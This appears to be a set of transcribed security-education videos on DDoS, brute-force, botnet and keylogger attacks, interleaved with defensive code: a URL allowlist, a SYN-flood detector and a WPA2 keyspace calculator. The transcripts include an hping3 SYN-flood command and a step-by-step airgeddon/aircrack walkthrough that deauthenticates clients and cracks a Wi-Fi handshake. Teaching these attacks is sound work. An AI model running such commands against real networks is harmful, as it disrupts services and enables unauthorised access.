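  if (resolved.origin !== APP_ORIGIN) return fallback;
  return resolved.pathname + resolved.search;
}

// Level 6: the gadget name after '#' became the src of a dynamically created
// <script>, guarded only by a regular expression on the scheme. A scheme
// denylist is easy to slip past; an allowlist of known script paths is not.
const GADGET_ALLOWLIST = new Set(["/static/gadget.js"]); // placeholder path
function safeGadgetUrl(name) {
  let resolved;
  try {
    resolved = new URL(String(name), APP_ORIGIN + "/");
  } catch {
    return null;
  }
  if (resolved.origin !== APP_ORIGIN || !GADGET_ALLOWLIST.has(resolved.pathname)) return null;
  return resolved.pathname;
}
```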
lately cyber criminals have been actively seeking out new services and protocols for amplifying these DDoS attacks active involvement with hacked machines and botnets allows further penetration into the consumer space allowing much more elaborate attack campaigns apart from general users multinational corporations have also had their fair share of problems GitHub a platform for software developers was the target of a DDoS attack in 2018. widely suspected to be conducted by Chinese authorities this attack went on for about 20 minutes after which the systems were brought into a stable condition it was the strongest DDoS attack to date at the time and made a lot of companies reconsider their security practices to combat such attacks even after years of experimentation DDoS attacks are still at large and can affect anyone in the consumer and corporate space hey everyone this is Baba from Simplilearn and welcome to this video on what is a DDoS attack let's learn more about what a DDoS attack is a distributed denial of service attack or DDoS is when an attacker or attackers attempt to make it impossible for a service to be delivered this can be achieved by thwarting access to virtually anything servers devices services networks applications and even specific transactions within applications in a DoS attack it's one system that is sending the malicious data or requests a DDoS attack comes from multiple systems generally these attacks work by drowning a system with requests for data this could be sending a web server so many requests to serve a page that it crashes under the demand or it could be a database being hit with a high volume of queries the result is that available internet bandwidth CPU and RAM capacity become overwhelmed the impact could range from a minor annoyance from disrupted services to entire websites applications or even entire businesses being taken offline more often than not these attacks are launched using machines in a botnet a botnet is a
network of devices that can be triggered to send requests from a remote source often known as the command and control center the bots in the network attack a particular target thereby hiding the original perpetrator of the DDoS campaign but how do these devices come under a botnet and what are the requests being made to the web servers let's learn more about these and how a DDoS attack works a DDoS attack is a two-phase process in the first phase a hacker creates a botnet of devices simply put a vast network of computers is hacked via malware ransomware or just simple social engineering these devices become a part of the botnet which can be triggered anytime to start bombarding a system or a server on the instruction of the hacker that created the botnet the devices in this network are called bots or zombies in the second phase a particular target is selected for the attack when the hacker finds the right time to attack all the zombies in the botnet network send requests to the target thereby taking up all the server's available bandwidth these can be simple ping requests or complex attacks like SYN flooding and UDP flooding the aim is to overwhelm the target with more traffic than the server or the network can accommodate the goal is to render the website or service inoperable there is a lot of wiggle room when it comes to the type of DDoS attack a hacker can go with depending on the target's vulnerability one can choose one of the three broad categories of DDoS attacks volume based attacks use massive amounts of bogus traffic to overwhelm a resource it can be a website or a server they include ICMP UDP and spoofed packet flood attacks the size of a volume based attack is measured in bits per second these attacks focus on clogging all the available bandwidth for the server thereby cutting the supply short several requests are sent to the server all of which warrant a reply thereby not allowing the target to cater to the legitimate users next we have the protocol
level attacks these attacks are meant to consume essential resources of the target server they exhaust the load balancers and firewalls which are meant to protect the system against DDoS attacks these protocol attacks include SYN floods and Smurf DDoS among others and the size is measured in packets per second for example in an SSL handshake the server replies to the hello message sent by the hacker which will be the client in this case but since the IP is spoofed and leads nowhere the server gets stuck in an endless loop of sending the acknowledgment without any end in sight finally we have the application level attacks application layer attacks are conducted by flooding applications with maliciously crafted requests the size of application layer attacks is measured in requests per second these are relatively sophisticated attacks that target application and operating system level vulnerabilities they prevent the specific applications from delivering necessary information to users and hog the network bandwidth up to the point of a system crash examples of such an attack are HTTP flooding and BGP hijacking a single device can request data from a server using HTTP post or get without any issues however when the requisite botnet is instructed to bombard the server with thousands of requests the database bandwidth gets jammed and it eventually becomes unresponsive and unusable but what about the reasons for such an attack there are multiple lines of thought as to why a hacker decides to launch a DDoS attack on unsuspecting targets let's take a look at a few of them the first option is to gain a competitive advantage many DDoS attacks are conducted by hacking communities against rival groups some organizations hire such communities to stagger their rivals' resources at a network level to gain an advantage in the playing field since being a victim of a DDoS attack indicates a lack of security the reputation of such a company takes a significant hit allowing the
rivals to cover up some ground secondly some hackers launch these DDoS attacks to hold multinational corporations at ransom the resources are jammed and the only way to clear the way is if the target company agrees to pay a designated amount of money to the hackers even a few minutes of inactivity is detrimental to a company's reputation in the global market and it can cause a spiral effect both in terms of market value and product security index most of the time a compromise is reached and the resources are freed after a while DDoS attacks have also found use in the political segment certain activists tend to use DDoS attacks to voice their opinion spreading the word online is much faster than any local rally or forum primarily political these attacks also focus on online communities ethical dilemmas or even protests against corporations let's take a look at a few ways that companies and individuals can protect themselves against DDoS attacks the company can employ load balancers and firewalls to help protect the data from such attacks load balancers reroute the traffic from one server to another in a DDoS attack this reduces the single point of failure and adds resiliency to the server data a firewall blocks unwanted traffic into a system and manages the number of requests made at a definite rate it checks for multiple attacks from a single IP and occasional slowdowns to detect a DDoS attack in action early detection of a DDoS attack goes a long way in recovering the data lost in such an event once you've detected the attack you will have to find a way to respond for example you will have to work on dropping the malicious DDoS traffic before it reaches your server so that it doesn't throttle and exhaust your bandwidth here is where you will filter the traffic so that only legitimate traffic reaches the server by intelligent routing you can break the remaining traffic into manageable chunks that can be handled by your cluster resources the most important stage in
DDoS mitigation is where you will look for patterns of DDoS attacks and use those to analyze and strengthen your mitigation techniques for example blocking an IP that's repeatedly found to be offending is a first step cloud providers like Amazon Web Services and Microsoft Azure who offer high levels of cyber security including firewalls and threat monitoring software can help protect your assets and network from DDoS criminals the cloud also has greater bandwidth than most private networks so it is unlikely to fail under the pressure of increased DDoS attacks additionally reputable cloud providers offer network redundancy duplicating copies of your data systems and equipment so that if your service becomes corrupted or unavailable due to a DDoS attack you can switch to secure access on backed-up versions without missing a beat one can also increase the amount of bandwidth available to a host server being targeted since DDoS attacks fundamentally operate on the principle of overwhelming systems with heavy traffic simply provisioning extra bandwidth to handle unexpected traffic spikes can provide a measure of protection this solution can prove expensive as a lot of that bandwidth is going to go unused most of the time a content delivery network or CDN distributes your content and boosts performance by minimizing the distance between your resources and end users it stores a cached version of your content in multiple locations and this eventually mitigates DDoS attacks by avoiding a single point of failure when the attacker is trying to focus on a single target popular CDNs include Akamai CDN Cloudflare AWS CloudFront etc let's start with our demo regarding the effects of DDoS attacks on a system for the demo we have a single device that will attack a target making it a DoS attack of sorts once a botnet is ready multiple devices can do the same and eventually emulate a DDoS attack to do so we will use the virtualization software called VMware with an instance
of the Parrot Security operating system running for a target machine we will be running another VMware instance of a standard Linux distribution known as Linux Lite on the target device we can use Wireshark to determine when the attack begins and see the effects of the attack accordingly this is Linux Lite which is the target machine and this is Parrot Security which is used by the hacker when trying to launch a DDoS attack this is just one of the distros that can be used to launch the attack we must first find the IP address of our target so to find the IP address we open the terminal and type ifconfig and here we can find the IP address now remember we're launching this attack in VMware both the instances of Parrot Security and Linux Lite are being run on my local network so the address that you can see here is 192.168.72.129 which is a private address this IP cannot be accessed from outside the network basically by anyone who is not connected to my Wi-Fi when launching attacks on public servers or public addresses the target will have a public IP address that does not belong to the 192.168 subnet once we have the IP address we can use a tool called hping3 hping3 is an open source packet generator and analyzer for the TCP protocol to check what the effects of an attack are we will be using Wireshark Wireshark is a network traffic analyzer we can see whatever traffic is passing through the Linux Lite distro being displayed over here with the IP address the source IP and the destination IP as to where the request is being transferred to once we have the DoS attack launched you can see the results coming over here from the source IP which will be Parrot Security now to launch the hping3 command we need to give sudo access to the console which is root access the hping3 command will have a few arguments to go with it which are as you can see on the screen -S --flood -V -p 80 and the IP address of the target which is 192.168.72.129 in this
command we have a few arguments such as -S which specifies SYN packets like in an SSL handshake we have the SYN request that the client sends to the server to initiate a connection --flood aims to ignore the replies that the server will send back to the client in response to the SYN packets here the Parrot Security OS is the client and Linux Lite is the server -V stands for verbosity as in we will see some output when the requests are being sent -p 80 stands for port 80 and you can replace the port number if you want to attack a different port and finally we have the IP address of our target as of right now if we check Wireshark it is relatively clear and there is no indication of a DDoS attack incoming now once we launch the attack over here we can see the requests coming in from this IP which is 192.168.72.128 till now the network is still responsive and so is Linux Lite the requests keep on coming and we can see the HTTP flooding has started in flood mode after a few seconds of this attack continuing the server will start shutting down now remember Linux Lite is a distro and such Linux distros serve as the backend to many servers across the world for example a few seconds have passed from the attack now and the system has become completely unresponsive this has happened due to the huge number of requests that came from Parrot Security you can see whatever I press nothing responds even Wireshark has stopped capturing new requests because the CPU usage right now is at 100% and at this point of time anyone who is trying to request some information from this Linux distro or where this Linux distro is being used as a backend for a server or a database cannot access anything the system has completely stopped responding and any legitimate request from legitimate users will be dropped once you stop the attack over here
it takes a bit of time to settle down now remember it's still out of control but eventually the traffic dies down and the system regains its strength it is relatively easy to gauge right now the effect of a DoS attack now remember this Linux Lite is just a VM instance actual website servers and web databases have much more bandwidth and are very secure and it's tough to break into them that is why we cannot use a single machine to break into them that is where a DDoS attack comes into play what we did right now is a DoS attack as in a single system is being used to penetrate a target server using a single request now in a DDoS attack multiple systems such as multiple Parrot Security instances or multiple zombies or bots in a botnet network can attack a target server to completely shut down the machine and drop any legitimate request thereby rendering the service and the target completely unusable and inoperable as a final note we would like to remind you that this is for educational purposes only and we do not endorse any attacks on any domains only test this on servers and networks that you have permission to test on cyber security has become one of the most rigid industries in the last decade while simultaneously being the most challenged with every aspect of corporate culture going online and embracing cloud computing there is a plethora of critical data circulating through the internet all worth billions of dollars to the right person increasing benefits require more complex attacks and one of these attacks is a brute force attack a brute force attack also known as brute force cracking is the cyber attack equivalent of trying every key on your keyring and eventually finding the right one brute force attacks are simple and reliable there is no prior knowledge needed about the victim to start an attack most of the systems falling prey to brute force attacks are actually well secured attackers let a computer do the work that is trying different combinations of usernames
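The Wireshark view in the demo above shows what a SYN flood looks like from the target's side: a stream of SYNs from one source that never completes a handshake. As an added example, not code from the video, here is that observation turned into detection logic over a constructed packet summary; the traffic lines are made up, modelled on the demo's addresses (attacker 192.168.72.128, target 192.168.72.129).

```python
"""Added example, not from the video: detect a SYN flood like the hping3 demo
above from a packet summary, by tracking per-source SYNs toward the target
that never complete the handshake. Packet lines are constructed, modelled on
the demo (attacker 192.168.72.128, target 192.168.72.129)."""
from collections import defaultdict, deque
from dataclasses import dataclass


@dataclass(frozen=True)
class Packet:
    ts: float    # capture time in seconds
    src: str     # source IP
    dst: str     # destination IP
    dport: int   # destination TCP port
    flags: str   # TCP flags as letters, e.g. "S", "SA", "A", "R"


def parse_summary(lines):
    """Parse constructed summary lines of the form '<ts> <src> <dst> <dport> <flags>'."""
    packets = []
    for line in lines:
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        ts, src, dst, dport, flags = line.split()
        packets.append(Packet(float(ts), src, dst, int(dport), flags))
    return packets


def detect_syn_flood(packets, target_ip, target_port=80, window=1.0, threshold=100):
    """Return {src: peak_half_open} for sources whose SYNs toward the target
    that were not followed by an ACK (or RST) from the same source reached
    `threshold` within any `window` seconds. A flooding client never answers
    the SYN-ACK, so its SYNs pile up; a normal client ACKs each handshake."""
    pending = defaultdict(deque)   # src -> timestamps of unanswered SYNs
    peak = defaultdict(int)
    for p in sorted(packets, key=lambda p: p.ts):
        if p.dst != target_ip or p.dport != target_port:
            continue
        q = pending[p.src]
        while q and p.ts - q[0] > window:   # expire SYNs outside the window
            q.popleft()
        if p.flags == "S":
            q.append(p.ts)
        elif p.flags in ("A", "R", "RA") and q:   # handshake completed or aborted
            q.popleft()
        peak[p.src] = max(peak[p.src], len(q))
    return {src: n for src, n in peak.items() if n >= threshold}


def build_sample():
    """Constructed traffic: one client doing three normal handshakes, then a
    flooder sending 150 SYNs in half a second without ever acknowledging."""
    lines = ["# ts src dst dport flags (constructed)"]
    for i in range(3):
        t = 0.2 * i
        lines.append(f"{t:.4f} 192.168.72.1 192.168.72.129 80 S")
        lines.append(f"{t + 0.0005:.4f} 192.168.72.129 192.168.72.1 51000 SA")
        lines.append(f"{t + 0.0010:.4f} 192.168.72.1 192.168.72.129 80 A")
    for i in range(150):
        t = 1.0 + i * (0.5 / 150)
        lines.append(f"{t:.4f} 192.168.72.128 192.168.72.129 80 S")
        # the target's SYN-ACK goes unanswered; the flooder ignores it
        lines.append(f"{t + 0.0001:.4f} 192.168.72.129 192.168.72.128 40000 SA")
    return lines


def run_demo():
    return detect_syn_flood(parse_summary(build_sample()), "192.168.72.129")


if __name__ == "__main__":
    for src, n in run_demo().items():
        print(f"possible SYN flood from {src}: {n} half-open connections in one window")
```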
and passwords until they find the one that works due to this repeated trial and error format the strength of the password matters a great deal although with enough time and resources brute force will break a system since it runs multiple combinations until it finds the right passcode hey everyone this is Baba from Simplilearn and welcome to this video on what is a brute force attack let's begin with learning about brute force attacks in detail a brute force attack also known as an exhaustive search is a cryptographic hack that relies on guessing possible combinations of a targeted password until the correct password is discovered it can be used to break into online accounts encrypted documents or even network peripheral devices the longer the password the more combinations that will need to be tested a brute force attack can be time consuming and difficult to perform if methods such as data obfuscation are used and at times downright impossible however if the password is weak it could merely take seconds with hardly any effort dictionary attacks are an alternative to brute force attacks where the attacker already has a list of usernames and passwords that need to be tested against the target it doesn't need to create any other combinations on its own dictionary attacks are much more reliable than brute force in a real world context but their usefulness depends entirely on the strength of passwords being used by the general population there is a three-step process when it comes to brute forcing a system let's learn about each of them in detail in step 1 we have to settle on a tool that we are going to use for brute forcing there are some popular names on the market like hashcat Hydra and John the Ripper while each of them has its own strengths and weaknesses each of them performs well with the right configuration all of these tools come pre-installed with certain Linux distributions that cater to penetration testers and cyber security analysts like Kali Linux and Parrot
Security after deciding what tool to use we can start generating combinations of alphanumeric variables whose only limitation is the number of characters for example while using Hydra a single six digit password will create 900 000 passwords with only digits involved add alphabets and symbols to that sample space and that number grows exponentially the popular tools allow customizing this process let's say the hacker is aware of the password being a specific eight digit word containing only letters and symbols this will substantially increase the chances of being able to guess the right password since we remove the time taken to generate the longer ones and we omit the need for including digits in such combinations these small tweaks go a long way in organizing an efficient brute force attack since running all the combinations with no filters will dramatically reduce the odds of finding the right credentials in time in the final step we run these combinations against the file or service that is being broken we can try and break into a specific encrypted document a social media account or even devices at home that connect to the internet let's say there is a Wi-Fi router the generated passwords are then fed into the connection one after the other it is a long and arduous process but the work is left to the computer rather than someone manually clicking and checking each of these passcodes any password that doesn't unlock the router is discarded and the brute force tool simply moves on to the next one this keeps going on until it finds the right combination which unlocks the router sometimes reaching the success stage takes days and weeks which makes it cumbersome for people with low computing power at their disposal however the ability to crack any system in the world purely due to bad password habits is very appealing and the general public tends to stick with simple and easy to use passwords now that we have a fair idea about how brute force works let's see if we can
answer this question we learned about how complex passwords are tougher to crack by brute force among the ones listed on the screen which one do you believe will take the longest to be broken when using brute force tools leave your answers in the comments section and we will get back to you with the correct option next week let's move on to the harmful effects of getting a system compromised due to brute force attacks a hacked laptop or mobile can have social media accounts logged in giving the hackers free access to the victim's connections it has been reported on multiple occasions that compromised Facebook accounts are sending malicious links and attachments to people on their friends list one of the significant reasons for hacking is that malware infusion is best done when spread from multiple devices similar to distributing spam this reduces the chance of tracing the source back to a single device which belongs to the hacker once brute forced a system can spread malware via email attachments sharing links file upload via FTP etc personal information such as credit card data usage habits private images and videos are all stored in our systems be it in plain format or root folders a compromised laptop means easy access to this information that can be further used to impersonate the victim regarding bank verification among other things once a system is hacked it can also be used as a mail server that distributes spam across lists of victims since the hacked machines all have different IP addresses and MAC addresses it becomes challenging to trace the spam back to the original hacker with so many harmful implications arising from a brute force attack it's imperative that the general public must be protected against such attacks let's learn about some of the ways we can prevent ourselves from becoming a victim of brute force attacks using passwords consisting of letters and numbers gives a much higher chance of withstanding brute force attacks thanks to the sheer number of
combinations they can produce the longer the password the less likely it is that a hacker will devote the time and resources to brute force it having alphanumeric passwords also allows the user to keep different passwords for different websites this is to ensure that if a single account or a password is compromised due to a breach or a hack the rest of the accounts are isolated from the incident two-factor authentication involves receiving a one-time password on a trusted device before a new login is allowed this OTP can be obtained either via email SMS or specific 2FA applications like Authy and Aegis email and SMS based OTPs are considered relatively less secure nowadays due to the ease with which SIM cards can be duplicated and mailboxes can be hacked applications that are specifically made for 2FA codes are much more reliable and secure captchas are used to stop bots from running through web pages precisely to prevent brute forcing through the website since brute force tools are automated forcing the hacker to solve a captcha manually for every iteration of a password is very challenging the captcha system can filter out these automated bots that keep refreshing the page with different credentials thereby reducing the chances of brute force considerably a definite rule that locks the account being attacked for 30 minutes after a specific number of attempts is a good way to prevent brute force attempts many websites lock an account for 30 minutes after three failed password attempts to secure the account against any such attack as an additional note some websites also send an email informing the user that there have been three unsuccessful attempts to log into the website let's look at a demonstration of how brute force attacks work in a real world situation the world has gone wireless with Wi-Fi taking the reins in every household it's natural that the security will always be up for debate to further test the security index and understand brute force attacks we will
attempt to break into the password of a Wi-Fi router for that to happen we first need to capture a handshake file which is a connection file from the Wi-Fi router to a connecting device like a mobile or a laptop the operating system used for this process is Parrot Security a Linux distribution that is catered to penetration testers all the tools being used in this demo can easily be found pre-installed in this operating system if getting your learning started is half the battle what if you could do that for free visit SkillUp by Simplilearn click on the link in the description to know more to start our demo we're going to use a tool called airgeddon which is made to hack into wireless networks specifically at this point it's going to check for all the necessary scripts that are installed in the system to crack into a Wi-Fi and to capture the handshake file we're going to need an external network card the significance of the external network card is that it supports both managed mode and monitor mode for now the wlx1 named card is my external network adapter which I'm going to select to be able to capture data over the air we're going to need to put it in monitor mode as you can see above it's written it is in managed mode right now so we're going to select option 2 which is to put the interface in monitor mode and its name is now wlan0mon the monitor mode is necessary to capture data over the air that is the reason why we need an external card since a lot of inbuilt cards that come with laptops and systems do not support monitor mode once we select the mode we can go into the fifth option which is the handshake tools menu in the first step you have to explore for targets and it is written that monitor mode is necessary to select a target so let's explore for targets and press enter we have to let this run for about 60 seconds to get a fair idea about the networks that are currently working in this locality for example this ESSID is supposed to be the
Wi-Fi name that we see when connecting to a network jio 24 recover me these are all the names that we see on our mobile when trying to search for Wi-Fi networks the BSSID is supposed to be an identifier somewhat like a MAC address that identifies this network from other devices the channel shows as 1 or 2 or one of the many channels that the networks can operate on this here is supposed to be a client that is connected to one such network for example the station that you can see 5626 this is supposed to be the MAC address of the device that is connected to a router its BSSID is supposed to show which Wi-Fi it is connected to for example 58 95 d8 is this one which is the jio 24 router so we already know which router has a device connected to it and we can use our attack to capture this handshake now that it has already run for one minute we press Ctrl C and we will be asked to select a target see it has already selected number five which is the jio 24 router as the one with clients so it is easy to run an attack on and it is easy to capture a handshake for select network 5 and we run a capture handshake it says we have a valid WPA WPA2 network target selected and that the script can continue now to capture the handshake we have a couple of attacks a deauth aireplay attack what this attack does is kick the clients out of the network in return when they try to reconnect to the Wi-Fi as they are configured that way that when a client is disconnected it tries to reconnect immediately the tool tries to capture a handshake file which in turn contains the security key which is necessary to initiate the handshake for our demo let's go with the second option that is the deauth aireplay attack select a timeout value let's say we give it 60 seconds and we start the script we can see it capturing data from the jio 24 network and here we go we have the WPA handshake files once the handshake file is captured you can actually close this and here we go
Congratulations on capturing a handshake. It has verified that a PMKID from the target network has successfully been captured. This is the file that is already stored, the .cap file. For the path, let's say we can keep it on the desktop; okay, we give the path and the handshake file is generated. We can already see a target over here, the same Jio24 router with the BSSID. Now if we return to the main menu, we already have the handshake file captured with us; now our job is to brute-force into that handshake capture file. The capture file is often encrypted with the security key of the Wi-Fi network; if we know how to decrypt it, we will automatically get the security key. So let's go to the offline WPA/WPA2 decrypt menu. Since we'll be cracking personal networks, we can go with option one. Now, to run the brute-force tool we have two options: either we can go with aircrack or we can go with hashcat. Let's go with aircrack + crunch, which is a brute-force attack against a handshake file; we can go with option two. It can already detect the capture file that we have generated, so we select yes. The BSSID is the one which denotes the Jio24 router, so we're going to select yes as well. The minimum length of the key: for example, it has already checked that the minimum length of a Wi-Fi security key, which is a WPA2-PSK key, will always be more than 8 digits and below 64 digits, so we have to select something in between this range. So if we already know, let's say, that the password is at least 10 digits, we can go with the minimum length as 10, and as a rough guess let's say we put the maximum length as 20.
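The minimum and maximum length chosen above decide how large the search is, and the character set chosen next decides it even more. The following is an added, defender-side example (not code from the video or from airgeddon) that sizes that search for a passphrase policy: it counts the candidates a brute-force run over a given character set and length range would have to test, and measures what each test costs, because a WPA2-PSK candidate can only be checked against a captured handshake after it has been run through the 802.11i PMK derivation (PBKDF2-HMAC-SHA1, salted with the SSID, 4096 rounds). The character-set labels, the sample SSID and the assumed guess rate are constructed for the example.

```python
"""WPA2-PSK passphrase policy check: keyspace size versus per-guess PBKDF2 cost.

Added example for this page; not the video's or airgeddon's code. The
character-set labels, sample SSID and guess rate below are assumptions.
"""
import hashlib
import math
import string
import time

# Character sets an operator might hand to a wordlist generator. The names
# are ours for this example, not any tool's menu labels.
CHARSETS = {
    "digits": string.digits,
    "upper+digits": string.ascii_uppercase + string.digits,
    "lower+upper+digits": string.ascii_letters + string.digits,
    "all printable": string.ascii_letters + string.digits + string.punctuation,
}


def wpa2_pmk(ssid: str, passphrase: str) -> bytes:
    """Derive the 802.11i Pairwise Master Key from an ASCII passphrase:
    PBKDF2-HMAC-SHA1 with the SSID as salt, 4096 iterations, 32-byte output.
    Every brute-force candidate has to go through this before it can be
    tested against a handshake, which is what makes each guess expensive."""
    if not 8 <= len(passphrase) <= 63:
        raise ValueError("WPA2-PSK passphrases are 8 to 63 ASCII characters")
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("ascii"),
                               ssid.encode("ascii"), 4096, 32)


def keyspace(charset_size: int, min_len: int, max_len: int) -> int:
    """Number of candidates of length min_len..max_len over a character set."""
    if min_len < 1 or max_len < min_len:
        raise ValueError("invalid length range")
    return sum(charset_size ** n for n in range(min_len, max_len + 1))


def entropy_bits(space: int) -> float:
    """Equivalent entropy of a uniformly random pick from the keyspace."""
    return math.log2(space)


def years_to_exhaust(space: int, guesses_per_second: float) -> float:
    """Worst-case time to try every candidate at a given guess rate."""
    return space / guesses_per_second / (365 * 24 * 3600)


def measure_pmk_cost(ssid: str, samples: int = 20) -> float:
    """Seconds per PMK derivation on this machine (one Python thread)."""
    start = time.perf_counter()
    for i in range(samples):
        wpa2_pmk(ssid, f"timing-only-{i:04d}")  # constructed throwaway passphrases
    return (time.perf_counter() - start) / samples


def policy_report(min_len: int, max_len: int, guesses_per_second: float):
    """One row per charset: (name, keyspace, entropy bits, years to exhaust)."""
    rows = []
    for name, charset in CHARSETS.items():
        space = keyspace(len(charset), min_len, max_len)
        rows.append((name, space, round(entropy_bits(space), 1),
                     years_to_exhaust(space, guesses_per_second)))
    return rows


if __name__ == "__main__":
    # Constructed sample values: the 10..20 character range used in the
    # demo and an assumed rate of 1,000,000 PMK derivations per second.
    ASSUMED_RATE = 1_000_000
    cost_ms = measure_pmk_cost("ExampleSSID") * 1e3
    print(f"One PMK derivation on this machine: about {cost_ms:.2f} ms")
    for name, space, bits, years in policy_report(10, 20, ASSUMED_RATE):
        print(f"{name:20s} {space:.3e} candidates {bits:6.1f} bits {years:.3e} years")
```

The table this prints is the defender's view of the same numbers the demo's cracking run depends on: a short passphrase over digits only is exhausted quickly, while a long passphrase over the full printable set cannot be enumerated at any realistic rate, so the practical risk shifts to dictionary and pattern guessing rather than exhaustive search. The rate is the one unknown you have to assume; the per-guess PBKDF2 cost is fixed by the standard.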
The character set that we're going to use for checking the password will affect the time taken to brute-force. For example, if we already know, or we have seen, a user use a password while connecting to the router that has only numbers and symbols, then we can choose accordingly. Let's say we go with only uppercase characters and numeric characters: go with option seven, and it's going to start decrypting. So, how aircrack is working right here: you can see this passphrase over here; the first five or six characters are A. It starts working its way from the end, from the last character; it keeps trying every single combination. You can see the fourth character from the right side, the D; it will eventually turn to E, because it keeps checking every single character from the end. This will keep going on until all the single characters are tested and every single combination is tried out. Since the handshake file is encrypted using the security key, that is the WPA2 key of the router, whichever passphrase is able to decrypt the handshake completely will be the key of the Wi-Fi router. This is the way we can brute-force into Wi-Fi routers anywhere in the world.

Cyber attacks are frequently making headlines in today's digital environment. At any time, everyone who uses a computer could become a victim of a cyber attack. There are various sorts of cyber attacks, ranging from phishing to password attacks. In this video we'll look into one such attack that is known as a botnet. But before we begin, if you love watching tech videos, subscribe to our channel and hit the bell icon to never miss an update. To begin with, let's take a look at some of the famous botnet attacks. The first one is the Mirai botnet, which is a malicious program designed to attack vulnerable IoT devices and infect them to form a network of bots that on command perform basic and medium-level denial-of-service attacks. Then we have the Zeus bot, specifically designed for attacking the system for bank-related
information and data. Now let's see what exactly a botnet is. Botnet refers to a network of hijacked, interconnected devices that are installed with malicious code known as malware. Each of these infected devices is known as a bot. The hijacker, a criminal known as a bot herder, remotely controls them. The botnet is used to automate large-scale attacks including data theft, server failure, malware propagation and denial-of-service attacks. Now that we know what exactly a botnet is, let's dive deeper into learning how a botnet works. During the preparation of a botnet network, the first step involves preparing the botnet army; after that, the connection between the botnet army and the control server is established; and in the end, the launching of the attack is done by the bot herder. Let's understand through our illustration. Firstly, we have a bot herder that initiates the attack; according to the control server commands, the devices that are infected with the malware programs begin to attack the infected system. Let's see some details regarding the preparation of the botnet army. The first step is known as prepping the botnet army: the first step in creating a botnet is to infect as many connected devices as possible; this ensures that there are enough bots to carry out the attack. This way it creates bots, either by exploiting security gaps in software or websites or using phishing attacks; they are often deployed through Trojan horses. For the next step we have establishing the connection: once it hacks a device as per the previous step, it infects it with a specific malware that connects the device back to the control server; a bot herder uses command programming to drive the bots' actions. And the last step is known as launching the attack: once infected, a bot allows access to admin-level operations like gathering and stealing of data, reading and rewriting the system data, monitoring user activities, and performing denial-of-service attacks, including other cyber crimes. Now
let's take a look at the botnet architecture. The first type is known as the client-server model. The client-server model is a traditional model that operates with the help of a command-and-control center server and communication protocols like IRC; when the bot herder issues a command to the server, it is then relayed to the clients to perform malicious actions. Then we have the peer-to-peer model; here, controlling the infected bots involves a peer-to-peer network that relies on a decentralized approach, that is, the bots are topologically interconnected and act as both the C&C server, that is the server, and the client. The hackers adopt this approach to avoid detection and single points of failure. In the end we will see some points on countermeasures against botnet attacks. The first step is to have updated drivers and system updates; after that, we should avoid clicking random pop-ups or links that we often see on the internet; and lastly, having certified antivirus and anti-spyware software and a firewall installed on a system will protect against malware attacks.

The internet is an endless source of information and data; still, in some cases we come across occurrences like cyber attacks, hacking and forced entry, which may affect our time on the web. Hi everyone, and welcome to the Simplilearn channel. Today we will discuss a topic that secretly records our input data, which is known as keyloggers. But before we begin, if you like watching tech videos, subscribe to our channel and hit the bell icon to never miss an update. To understand the keylogging problem better, let's take a look at an example. This is June; she works in a business firm where she manages the company's data regularly. This is Jacob from the information department, who is here to inform her about some of the security protocols. During the briefing, she informed him about some of the problems her system was facing, which included slow reaction speed and unusual internet activity. As Jacob heard about the problems with the system, he
thinks of the possibility of what could be the reason behind these problems her system was facing. The conclusion that he came to was the keylogging issue. Unaware of the problem her system was facing, she asked him about some of the details regarding it. For today's topic, we learn what exactly keyloggers are and how they affect our system, and what harmful effects keylogging can bring into the system. To begin with, we learn what exactly the keylogging program is. As the name suggests, a keylogger is a malicious program or a tool that is designed to record keystrokes that are typed during data input and record them into a log file; then the same program secretly sends these log files to its origin, where they can be used for malicious acts by the hacker. Now that we know what the keylogging program is, let's take a look at how they enter the system. Searching for a suitable driver for a system can often lead to the installation of the keylogging program on the system if we often visit suspicious sites and uncertified software is installed on the system. Then, if we use unknown links or visit unknown websites which come through unknown addresses, that can also be a reason behind a keylogging issue entering the system. And lastly, there are often cases where different pop-ups that we often see on social sites or different media sites can lead to the installation of a keylogging program on a system. Now that we know how the problem gets into the system, let's take a look at how to identify whether the system is infected by the keylogging issue. The keylogging issue can be identified if there are often cases when the keyboard lags behind the system: the data that we enter sometimes gets stuck in between when we type through the input. Then there are cases when a system freeze occurs, without knowing what exactly could be the reason behind it; and also there is delayed reaction time for different applications that run on the system. And lastly, there are different
cases when we often see suspicious internet activity on the system that we don't know about; this could lead to the identification of a problem in the system. Now we'll take a look at different types of keyloggers that are present on the net, which can harm our system differently. The first type of keylogger is API-based, the most common keylogging case, which uses APIs to keep a log of the typed data and share it with its origin for malicious purposes; each time we press a key, the keylogger intercepts the signal and logs it. Then we have form-grabbing-based keyloggers; as the name suggests, they are form-based keyloggers that store the form data, that is, if we often use web forms or different kinds of forms to enter different data, it can be recorded by the program and sent to its origin. Then we have kernel-based keyloggers; these keyloggers are installed deep in the operating system, where they can hide from different antiviruses if not checked properly, and they record the data that we type on the keyboard and send it to its origin. And lastly we have hardware keyloggers; these keyloggers are present directly in the hardware, that is, they are embedded into the system, where they record the data that we type on the keyboard. Now let's take a look at how hackers differentiate different types of recorded data and exploit them. When hackers receive information about the target, they might use it to blackmail the target, which may affect the personal life of the target, and also blackmail them for different money-related issues. Then, in the case of company data that is recorded by the keylogging program, it can also affect the economic value of the company in the market, which may lead to the downfall of the company. Also, in some cases the keylogging program can log data about military secrets, which may include nuclear codes or security protocols which are necessary to maintain the security of a country. Now let's take a look at whether mobile devices get infected
with the keylogging issue or not. In the case of handheld devices, infections by keyloggers are low in comparison to computer systems, as they use an on-screen keyboard or virtual keyboard; but in some cases we often see different kinds of malicious programs getting installed on the handheld device if we often visit different uncertified websites or illegal websites or torrent sites. And also, a device that is infected with the keylogger issue or a different kind of malicious program can often lead to the exploitation of data, which includes photos, emails or important files, by the hacker or cyber criminal that installed the particular malicious program on the system. Now, to prevent a system from getting infected by the keylogging program, let's take a look at different points. The first point includes the use of different antivirus software or tools, which can prevent the entering of malicious programs into the system; then, keeping system security protocols regularly updated is also a good habit; and lastly, using a virtual keyboard to input our sensitive data, which may include bank details, login details or different passwords related to different websites.

